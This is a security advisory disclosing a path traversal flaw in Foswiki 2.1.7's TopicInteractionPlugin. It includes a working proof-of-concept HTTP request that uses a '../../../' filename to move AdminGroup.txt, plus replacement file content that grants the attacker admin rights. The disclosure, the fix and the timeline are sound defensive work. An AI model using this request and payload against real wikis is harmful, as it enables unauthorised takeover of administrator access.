usd-2022-0014 | Foswiki 2.1.7 Path Traversal

Advisory ID: usd-2022-0014
Product: Foswiki
Affected Version: 2.1.7
Vulnerability Type: https://cwe.mitre.org/data/definitions/23.html
Security Risk: High
Vendor URL: https://foswiki.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Closed
Last Update: 2022-01-22

Description

The TopicInteractionPlugin allows relative path traversal by changing the filename parameter. The plugin moves attachments to other wiki pages. These attachments are stored in pub/<web>/<topic> directory. The content of the wiki pages are stored in data/ directory. Going back three directories allows to move files outside the pub directory (e.g. the AdminGroup.txt file which handles the permissions to the backend configuration pages.)

Proof of Concept

The following requests (re)moves the file AdminGroup.txt of the Main web, which allows an attacker to create a new one afterwards and become AdminGroup member.

The following request remove the file "AdminGroup.txt":

POST /bin/rest/TopicInteractionPlugin/move HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Origin: http://localhost
Connection: close
Referer: http://localhost/Main/ChrisChris
Cookie: FOSWIKISID=582be25dd6c36a6d45e6a37277378374; FOSWIKISTRIKEONE=21d8825b6b492836f1235aa0293bc310
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

validation_key=06f78c2c2612a63bf8a8eef6aee71544&id=move&filename=../../../data/Main/AdminGroup.txt&topic=Main.ChrisChris&newweb=Sandbox&newtopic=Test

 

Afterwards a user can create a new one, which contains their username and become an admin.

The following content can be used for a new AdminGroup.txt file.

%META:TOPICINFO{author="BaseUserMapping_999" comment="" date="1648462765" format="1.1" version="1"}%
%META:TOPICPARENT{name="WikiGroups"}%

%INCLUDE{"%USERSWEB%.AdminUser" section="sudo_login"}%

%IF{"(NOT defined GROUP) OR $GROUP = ''" then='
<sticky><div class="foswikiNotification"></sticky>
*How to add the first administrator* %BR%
If you haven\'t previously set up an administrator, follow these steps: (*Note:* This help text will disappear once you have added a user to this group.)
$percntINCLUDE{"%SYSTEMWEB%.InstallationGuide" section="addadmin"}$percnt
<sticky></div></sticky>'}%

More information on Administrators, and on how to use the AdminGroup is found in the [[%SYSTEMWEB%.InstallationGuide#DefineAdminUser][Installation Guide]]

You can edit this topic to add a description to the AdminGroup

%META:PREFERENCE{name="GROUP" title="GROUP" type="Set" value=""}%
%META:PREFERENCE{name="ALLOWTOPICCHANGE" title="ALLOWTOPICCHANGE" type="Set" value="AdminGroup,ChrisChris"}%
%META:PREFERENCE{name="VIEW_TEMPLATE" title="VIEW_TEMPLATE" type="Set" value="GroupView"}

 

The "ALLOWTOPICCHANGE" permission contains our username, which allows us to become an admin user.

Fix

Restrict the movement of attachments to the pub directory.

References

https://owasp.org/www-community/attacks/Path_Traversal

Timeline

  • 2022-01-05: Vulnerability identified by Christian Pöschl
  • 2022-04-27: First contact request made to the vendor
  • 2022-05-05: Second contact request made to the vendor
  • 2022-06-09: Share vulnerability details with vendor
  • 2022-06-09: Fix released by vendor

Credits

This security vulnerability was found by Christian Pöschl of usd AG.